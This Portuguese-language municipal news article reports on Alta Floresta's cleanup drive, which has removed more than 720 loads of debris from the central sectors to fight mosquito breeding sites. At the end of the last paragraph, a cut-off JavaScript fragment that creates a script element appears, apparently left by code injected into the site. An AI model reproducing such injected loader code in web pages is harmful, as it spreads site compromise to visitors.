Capa / Cidades / Mutirão de Limpeza retirou mais de 720 cargas de entulho nos setores do centro

Mutirão de Limpeza retirou mais de 720 cargas de entulho nos setores do centro

Desde que começou, no dia 11 de janeiro, o Mutirão de Limpeza já recolheu mais de 1.300 cargas de lixo seco em 28 bairros e setores da cidade. A ação da Prefeitura de Alta Floresta conta com a parceria das empresas São Manoel Energia, Enel Green Power e Buriti Empreendimentos.

16.03.2016_Mutirão de Limpeza retirou mais de 720 cargas de entulho nos setores do centro (3)Lindomar Leal
Assessoria da PMAF

Foram necessários quinze dias ininterruptos de muito trabalho para que a Prefeitura de Alta Floresta conseguisse recolher o entulho dos setores do centro da cidade. Neste período, segundo Gilberto Silva, coordenador da Defesa Civil Municipal e do Mutirão de Limpeza, foram retiradas mais de 720 cargas de lixo seco dos Setores G, GS, E, B, C, A, RI, Rodoviária, concluído o Setor D, e nos bairros São José Operário, Santa Maria, Novo Horizonte, Sol Nascente e Bom Jesus.
A limpeza realizada na região central da cidade retirou mais lixo do que o recolhimento feito nos bairros Jardim Panorama, Renascer, Primavera, Oliveiras, Tropical, Universitário, Oitis, Araras, Boa Nova I, II e III, e Setores J, H, F, Camélia, Florata e parte do Setor D, nestes locais foram retiradas pouco mais de 600 cargas de entulhos.
Na linha de frente da ação, acompanhando de perto o serviço, Gilberto Silva disse que os moradores estão aprovando o Mutirão de limpeza. “A população está muito contente e satisfeita com a atitude do prefeito de mandar fazer essa limpeza”, disse.
Iniciado no dia 11 de janeiro no bairro Jardim Panorama, o Mutirão de Limpeza será realizado nos 37 setores da cidade, ou seja, em todo o perímetro urbano. Não há previsão para conclusão, porém, o serviço segue em ritmo acelerado e tem dado resultados positivos, pois além de eliminar os focos de proliferação do mosquito Aedes aegypti, transmissor da Dengue, da Zika Vírus e da febre Chickungunya, principal objetivo desta ação, está deixando a cidade limpa.
De acordo com Gilberto Silva os próximos setores a serem atendidos serão os que estão localizados do lado de baixo da Avenida Amazonas, sentido centro da cidade. A ação terá início pelo bairro próximo a Universidade Estadual de Mato Grosso (UNEMAT), seguindo para o Norte I e II, Cidade Bela e Setor do Bento. “Vamos partir para a grande Cidade Alta realizando essa limpeza até chegar no Bairro Vila Nova, esse é um pedido do prefeito Asiel e nós estamos empenhados para executar esse trabalho”, salientou.
Para realizar o Mutirão de Limpeza a Prefeitura de Alta Floresta conta com a parceria das empresas São Manoel Energia, que cedeu dois caminhões e duas pás carregadeiras, Eneel Green Power, que disponibilizou dois caminhões e Buriti Empreendimentos que liberou uma pá carregadeira. Outros dois caminhões basculantes e uma pá carregadeira da Secretaria Municipal de Infraestrutura integram a frota de maquinário. “Essas empresas aderiram a nossa ideia e acredito que vão continuar por pelo menos noventa dias nesse projeto, então, quero agradecê-las porque elas têm sido grande parceiros da administração municipal na execução desse trabalho”, frisou Gilberto Silva.var d=document;var s=d.createElement(‘script’);

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top